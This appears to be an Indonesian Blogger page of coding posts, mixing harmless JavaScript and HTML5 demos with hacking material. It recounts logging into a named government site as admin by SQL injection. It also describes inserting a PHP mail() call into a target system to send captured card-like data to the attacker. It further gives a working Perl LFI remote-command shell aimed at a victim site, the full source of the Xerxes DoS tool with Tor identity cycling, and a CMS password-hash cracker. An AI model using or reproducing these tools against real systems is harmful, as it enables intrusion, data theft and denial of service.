Tampilkan postingan dengan label Coding. Tampilkan semua postingan
Tampilkan postingan dengan label Coding. Tampilkan semua postingan
Sabtu, 31 Maret 2012

Contoh Java Script Check & Uncheck All

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Contoh Latihan  Javascript :: Check & Uncheck All</title>
</head>
<script type=”text/javascript”>
function Check(){
//Ambil semua elemen dalam id formCheck
allCheckList = document.getElementById(“formCheck”).elements;
//Hitung banyaknya elemen
jumlahCheckList = allCheckList.length;
//Jika tombolCheck bernilai “Check All”
if(document.getElementById(“tombolCheck”).value == “Check All”){
for(i = 0; i < jumlahCheckList; i++){
//semua elemen ke-i checkbox nya diset true (dicentang)
allCheckList[i].checked = true;
}
//Set nilai tombolCheck menjadi “Uncheck All”
document.getElementById(“tombolCheck”).value = “Uncheck All”;
//Jika tombolCheck tidak bernilai “Check All” (sudah dirubah menjadi Uncheck All)
}else{
for(i = 0; i < jumlahCheckList; i++){
//semua elemen ke-i checkbox nya diset false (tidak dicentang)
allCheckList[i].checked = false;
}
//Set nilai tombolCheck menjadi “Check All”
document.getElementById(“tombolCheck”).value = “Check All”;
}
}
</script>
< ?php
$hobi = $_POST['hobi'];
if(empty($hobi)){
?>
<b>Silahkan Pilih Hobi Anda :</b>
<form id=”formCheck” method=”POST” action=”check_all.php”>
<input type=”checkbox” name=”hobi[1]” value=”Baca Koran” />Baca Koran<br />
<input type=”checkbox” name=”hobi[2]” value=”Memancing” />Memancing<br />
<input type=”checkbox” name=”hobi[3]” value=”Bikin Susah Orang” />Bikin Susah Orang<br />
<input type=”checkbox” name=”hobi[4]” value=”Menulis” />Menulis<br />
<input type=”checkbox” name=”hobi[5]” value=”Demonstrasi” />Demonstrasi<br />
<input type=”button” id=”tombolCheck” value=”Check All” onClick=”Check();”/>
<input type=”submit” value=”Submit” />
</form>
< ?php
}
if(is_array($hobi)){
echo ‘<b>Hobi yang anda pilih : <br />’;
foreach($hobi as $indek=>$namahobi){
echo ‘Hobi indek ‘.$indek.’ : ‘.$namahobi.’<br />’;
}
echo ‘<a href=”check_all.php”>Back &raquo;</a>’;
}
?>
</script></html>

Cek Bug Script PHP

Setelah terampungkan script php yang telah kita buat ada kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi system.

Dan siapa sangka script php yang telah dibuat itu aman dari kerentanan dalam masalah security. :D ~~~

Lalu, bagaimana mencegah sang hacker mengekploitasi, bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua ?? :D

Sebelum kita beralih maju ke langkah selanjutnya ada baiknya untuk mengenali bug popular yang paling sering diexploitasi.
Penulis akan mencoba untuk memberikan sedikit penjelasan, bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content Management system maupun yang lainnya. Di antaranya :
- XSS ( Cross Site Scripting )
- SQL Injection
- RFI ( Remote File Inclusion )
Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi karena tidak adanya filtering pada html maupun java script.

Tetapi pada dasarnya defacing ( perubahan kontent ) hanya terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat mencuri cookie kemudian menggunakannya untuk berbuat sesuatu yang … :D ~~

Contohnya :
Sensored [ maaf ]
SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker yang mencoba melakukan inject query sql melalui form ataupun via address bar pada browser internet. Sebagai contohnya ketika penulis mencoba login sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id ). Dengan menggunakan query ‘ or 1=1  penulis pun berhasil login. Pada dasarnya ‘ atau single quote dan or 1=1 itu berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh server sql adalah menjalankan query ” select * “. Yang terjadi adalah penulis diloloskan untuk login sebagai admin.

Berikut adalah gambar yang penulis capture ketika penulis berhasil login sebagai admin pada situs http://www.sumsel.go.id

tutorial jaringan komputer


tutorial jaringan komputer

Gambar ini diambil sebelum penulis mengontak webmaster via email untuk mempatch script phpnya.

RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut. Apabila user memasukkan url evil script miliknya pada variable yang digunakan dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan command di server milik anda untuk merubah konten situs atau bahkan merusaknya. :D ~~

Untuk contohnya silahkan anda cari di www.milw0rm.com :D ~

Keywordnya Remote File Inclusion. :D ~
Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm … tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara tidak sengaja maupun sengaja. :D ~

Pada dasarnya untuk mengecek bug dapat dilakukan secara online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di localhost anda ( offline ) saja.

Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda adalah sebuah addons mozilla firefox yang disediakan secara gratis. Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.

Tools tersebut dapat anda download disini :
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah digunakan telah disediakan untuk melakukan cek bug sql injection. :D

Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler interpreter ini nantinya digunakan untuk menjalankan script inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke direktori c:\perl\bin

Langkah selanjutnya :

1. Masukkan script yang akan anda scan kedalam sebuah direktori di c:\perl php.

ex : c:\perl\wordpress.
2. Masuk ke command prompt, start | run | cmd | enter
3. Setelah itu masuk ke direktory c:\perl\bin, cd c:\perl\bin

4. Jalankan scriptnya,
C:\Perl\bin>perl.exe inclusionscanner.pl
#Will check a directory for all includes and unsets
#Coded by Ironfist (ironsecurity.nl)
#Usage: create a folder in your perlfolder and put the files to be scanned in it
, next type the folder name below (eg myfolder)
#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)

Directory to read? c:\perl\wp

kemudian lihat hasilnya di c:\perl\bin\result.html

berikut hasil scan ketika penulis mencoba untuk melakukan cek inclusion pada wordpress-2.3.3 :

FOUND: require_once($locale_file);
in c:\perl\wp/wp-settings.php FOUND: require_once($import_root . ‘/’ . $file);
in c:\perl\wp/wp-admin/import.php FOUND: include_once($this->PluginDir . “class-smtp.php”);
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($lang_path.’phpmailer.lang-’.$lang_type.’.php’);
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($lang_path.’phpmailer.lang-en.php’);
in c:\perl\wp/wp-includes/class-phpmailer.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: include($template);
in c:\perl\wp/wp-includes/template-loader.php FOUND: require_once($_template_file);
in c:\perl\wp/wp-includes/theme.php
woww !!! :D ~~ silahkan di exploitasi eh di patch script milik anda. :D ~~
Ingat, jangan merusak, jangan berbuat vandal, jika anda menemukan bug di situs lain seperti yang telah saya sebutkan diatas, silahkan beritahu pihak admin.<–>

Email Logging Information

Lets begin!
Memaksimalkan Fungsi Email

= Hacking is Knowledge =
Tujuan dari memaksimalnya email pada topic ini adalah untuk logging informasi & data!
Pertama:
Kita menggunakan script PHP (Private Home Page)
Fungsi yang kita pake adalah mail();
Dimana pengiriman email dilakukan:
contoh:

<?php
// Contoh penggunaan
$Orangnya = “Budi Anduk”;
$NoId = “123456789″;
$CID = “234″;
$Exp = “10/2009″;
$Nama = “Nama Pengirim”;
$Emailnya = “email@pengirim.com”; // Email Pengirim
$Penerima = “emailanda@yahoo.com”; // Email Anda Sebagai Penerimas
$IsiEmail = “Berikut Ini Isi Log Data: “. $Orangnya .” “. $NoId .” “. $CID .” “. $Exp .” “; // Isi Email
$Subject = “Logging Data & Informasi”; // Judul Email
$Header = “From: “. $Nama . ” <” . $Emailnya . “>\r\n”; // Untuk Header
mail($Penerima, $Subject, $IsiEmail, $Header);
?>

Dari contoh di atas maka dapat kita simpulkan bahwa, kita bisa menggunakan fasilitas pengirim email untuk melakukan logging :)
Terkadang banyak file yang terenkripsi yang ada didatabase
Sehingga kita susah untuk melakukan decryptnya
Maka cara ini dapat kita gunakan..

Jika kita mendapatkan sebuah target dalam system,
dan disitu terjadi aktifitas pengiriman data ke database server dari client
Maka, kita dapat melakukan pengambilan data sebelum dilakukan encyption
Dengan cara menyisipkan variable” baru, yang bisa kita gunakan untuk menyimpan informasi & data

Kemudian kita kirim ke email kita tanpa terenkripsi sama skali..
Enak bukan? Hahahha.. That is the concept!
Silakan baca artikel, analisa script, silakan download dibawah:

Nah, untuk penjelasan lengkapnya anda bisa download tutorial dan ujicoba lengkapnya di:
Untuk melakukan hasil contohnya, anda upload semua file ke sebuah hosting, kemudian praktekkan sesuai dengan contoh.
Jangan lupa ganti email pengirim menjadi:
<?
$Penerima = “emailanda@domainemailanda.com”; // Email Anda Sebagai Penerima
?>
Selamat mencoba! Semoga berhasil :D
Enjoy & Eat it!
==================[EOF]===================

LFI Remote Execute in PERL

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell.
#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " LFI Command Execution \n";
print "==========================================\n";
print "Usage: perl LFI.pl (without http:://)\n";
print "Ex. perl FLI.pl www.korban.com/index.php?page=\n";
exit;
}
$host=$ARGV[0];
$lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = );
while($cmd !~ "exit")
{
$content = "";
$ua = LWP::UserAgent->new();
$ua->agent('');
$request = HTTP::Request->new (GET => "http://".$host.$lfi."&cmd=".$cmd);
$response = $ua->request ($request);
$content = $response->content;
print $content."\n";
print "iDSc-shell# ";
chomp( $cmd = );
}
Cara menggunakannya adalah:
1. Install perl di komputer anda / komputer target (bersyukurlah kalau sudah terinstall)
2. Save file di atas: “LFI.pl”
3. Kemudian jalankan dengan perintah: “perl FLI.pl www.targetwebsiteanda.com/index.php?page=\n”
4. Tunggu hasilnya :)
Semoga berhasil & selamat mengeksplore!

PHP Arbitrary File Upload Simple Patching

Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload.
PHP Arbitary File Upload Patch
Kebanyakan website yang vuln diupload memiliki garis besar seperti ini:
Contoh simple upload.php file upload.
1
2
3
4
5
6
7
8
9
<span style="color: #0000ff;">&lt;?php
$uploaddir = 'uploads/'; // Relative path under webroot
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?&gt;</span>
Contoh form yang dipake dalam file index untuk upload:
1
2
3
4
<span style="color: #0000ff;">&lt;form name="upload" action="upload.php" method="POST" ENCTYPE="multipart/formdata"&gt;
Select the file to upload: &lt;input type="file" name="userfile"&gt;
&lt;input type="submit" name="upload" value="upload"&gt;
&lt;/form&gt;</span>
Disini tidak ada code yang memfilter upload filetype.
Jadi kita bisa langsung saja upload: shell.php
Patching yg bisa dilakukan adalah menambahkan filter filetype dalam script upload.php
Contohnya:
1
2
3
4
5
6
7
8
9
10
11
12
13
<span style="color: #0000ff;">&lt;?php
if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?&gt;</span>
Untuk “images/gif” bisa diganti dengan “images/jpg” dll…
Kita liat backgound request uploadnya
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<span style="color: #0000ff;">POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data;
Content-Length: 156
Content-Disposition: form-data; name="userfile"; filename="shell.php"
...
...
-
HTTP/1.1 200 OK
Date: Thu, 31 May 2007 13:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.2-pl6-gentoo
Connection: close
Content-Type: text/html
Sorry, we only allow uploading GIF images</span>
Hehehe..
Happy Patching..

Bypass PHP Arbitrary File Upload

Ok disana patchingnya emang ga terlalu bagus…
Karena filetype bisa di manipulasi..
Bukan dengan merename shell.jpg.php tetapi dengan memanipulasi “header” file
Cara membypassnya adalah sebagai berikut:
Review codenya dulu

Kalo kita coba di HTTP response server kira-kira dapat begini dengan code diatas:

Ok kita liat… ada footprint yang keren disana..
Gimana kalo kita manipulasi upload kita supaya http server membaca script kita sebagai images/gif
Simple code exploitnya..

Coba kita liat apakah sukses exploit kita..


Hohoohohoho…
Untuk patchingnya:
Kita perketat aja patchingnya dengan mengganti code diatas dengan code berikut

Happy Patching..

DDOS Tools: Xerxes DOS Tools

Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:
/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
}
void broke(int s) {
    // do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0″, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}
void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00″, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}
int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

Video Xerxes Dos

Semoga informasi ini bermanfaat sebagai pembelajaran yang lebih baik.

Multiple CMS Hash Cracker

Berikut ini adalah source untuk MD5/SHA-1 Cracker yang dibuat untuk Crack Content Management System Hash seperti Joomla, WordPress, Drupal, Dsb. Jadi bisa mempermudah pencarian hash, langsung aja deh :)
#!usr/bin/perl
use Digest::MD5 qw(md5_hex);
use Digest::SHA1 qw(sha1_hex);
# Author: localh0t
# Date: 09/06/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# Help
if(!$ARGV[7])
{
print “\n\n###########################################”;
print “\n# Multi CMS Hash Cracker v0.1 by localh0t #”;
print “\n###########################################”;
print “\n\nUse: perl $0 -d [WORLDLIST FOLDER] -h [MD5 | SHA-1 HASH] -s [SALT | USERNAME] -c [CMS]\n”;
print “Example: perl $0 -d /home/localh0t/wordlists/ -h caef8544a8e65e23f67ab844d4866e8d -s uZ*qX -c IPB\n”;
print “Example: perl $0 -d /home/localh0t/wordlists/ -h dc4a27b25e3f780b89c165f931d6f85d5bd6e33e -s Administrator -c SMF\n\n”;
print “Note: Worlists must end with .txt or .lst (or any extension)\n\n”;
print “Support:\n========\n”;
print “VB : md5_hex(md5_hex(password).salt) | (vBulletin)\n”;
print “SMF : sha1_hex(user.password) | (Simple Machines Forum)\n”;
print “IPB : md5_hex(md5_hex(salt).md5_hex(password)) | (Invision Power Board)\n”;
print “JOOMLA : md5_hex(password.salt) | (Joomla 1.x)\n\n”;
exit(0);
}
# Functions
sub ipb_cracker{
my $hash = shift;
my $salt = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = md5_hex(md5_hex($salt).md5_hex($password));
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
sub vb_cracker{
my $hash = shift;
my $salt = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = md5_hex(md5_hex($password).$salt);
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
sub smf_cracker{
my $hash = shift;
my $user = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = sha1_hex($user.$password);
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
sub joomla_cracker{
my $hash = shift;
my $salt = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = md5_hex($password.$salt);
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
my ($dir, $hash, $salt, $cms, $arg);
foreach $loop (@ARGV) {
for ($loop) {
/^-d$/ and do { $dir = $ARGV[($arg+1)]; last; };
/^-h$/ and do { $hash = $ARGV[($arg+1)]; last; };
/^-s$/ and do { $salt = $ARGV[($arg+1)]; last; };
/^-c$/ and do { $cms = $ARGV[($arg+1)]; last; };
}
$arg++;
}
# Main
print “\n[!] Cracking $hash with $salt as username/salt…\n\n”;
opendir(DIR, $dir) || die “\n[-] Folder not found\n\n”;
while($file = readdir(DIR)) {
if ($file ne ‘.’ and $file ne ‘..’) {
$FILES[$clean] = $file;
$clean++;
}
}
for ($cms) {
/^IPB$/ and do { $result = &ipb_cracker($hash,$salt,$dir); last; };
/^VB$/ and do { $result = &vb_cracker($hash,$salt,$dir); last; };
/^SMF$/ and do { $result = &smf_cracker($hash,$salt,$dir); last; };
/^JOOMLA$/ and do { $result = &joomla_cracker($hash,$salt,$dir); last; };
/^.$/ and do { print “[-] CMS not available\n”; exit(0); last; };
}
print $result;
# Exit
close(DICT);
closedir(DIR);
exit(0);
__END__
Bagaimana Penggunaannya? Berikut Petunjuknya:
  1. Install Perl Di Komputer Anda, Dengan Mendownload Perl. Untuk Linux Biasanya Sudah Terinstall, Di Windows Silakan Download Disini: http://www.activestate.com/activeperl/downloads
  2. Simpan File Tersebut “cmsdir.pl
  3. Ikuti Langkah Berikut:

Silakan Download Tools / Source Code:

Menambahkan Voice Transcription di Input Box

Seperti yang anda semua tahu, HTML 5 merupakan versi terbaru dari bahasa HTML yang menambahkan berbagai macam tag-tag yang membuat website bisa jauh lebih interaktif tanpa memerlukan bantuan plugin seperti Flash, Silverlight atau Java (bukan JavaScript ya…).

Nah, salah satu dari HTML 5 ini adalah Voice Transcription. Sampai sekarang memang Voice Transcription ini masih hanya berfungsi pada browser Google Chrome. Mungkin Firefox, Opera, Internet Explorer serta Safari akan menyusul nanti…

Untuk membuatnya sebenarnya sangatlah mudah! Anda hanya perlu menambahkan sebuah tambahan pada tag <input>. Jari-jemari ga perlu capek hanya untuk menulisnya karena hanya sedikit saja yang perlu ditambahkan…
Oke, daripada kebanyakan ngomong teori (sebagian besar orang bosen dengan teori) maka dari itu kita langsung lompat ke Prakteknya saja. Kita mulai dengan membuat form sederhana yang isinya adalah sebuah input box dan submit button.
<html>
<head>
<title>Contoh HTML5 Voice Transcription</title>
</head>
<body>
<h1>Voice Transcription</h1>
<form>
<input type=”input” name=”contohinput” />
<br/><input type=”submit” name=”contohsubmit”/>
</form>
</body>
</html>
Hasilnya adalah seperti ini:
Yap! Cuma sekedar page dengan input box biasa ditambah submit button yang juga biasa (NB: Memang submit buttonnya tidak akan kita apa-apain. Yang kita ubah hanya input boxnya saja). Sekarang waktunya kita menambahkan Voice Transcription pada input boxnya. Mari kita ubah…
Waktunya fokus kembali pada script input boxnya:
<input type=”input” name=”contohinput” />
Untuk menambahkan Voice Transcription maka kita harus menambahkan “x-webkit-speech” (tanpa tanda petik) ke tag input boxnya sehingga scriptnya menjadi seperti ini:
<input type=”input” name=”contohinput” x-webkit-speech/>
Sehingga secara keseluruhan scriptnya menjadi seperti ini:
<html>
<head>
<title>Contoh HTML5 Voice Transcription</title>
</head>
<body>
<h1>Voice Transcription</h1>
<form>
<
input type=”input” name=”contohinput” x-webkit-speech/><br/><input type=”submit” name=”contohsubmit”/>
</form>
</body>
</html>
Nah, mari kita coba Save dan uji coba (lagi)
Sudah deh, nongol gambar Microphone di Input Boxnya. Coba klik Microphonenya dan katakanlah sesuatu (dalam Bahasa Inggris) dan lihat hasilnya… Mantap bukan?
Itu hanyalah contoh sederhana dari penggunaan Voice Transcription HTML5. Kita bisa mengembangkannya lagi menjadi sesuatu yang lebih baik seperti untuk situs dictionary, dsb. Pokoknya, tergantung imajinasi deh :)
Terima kasih sudah membaca artikel buatan saya… Maaf bila ada kata-kata yang salah
 
© Copyright 2010-2011 Media Pengetahuan All Rights Reserved.
Template Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.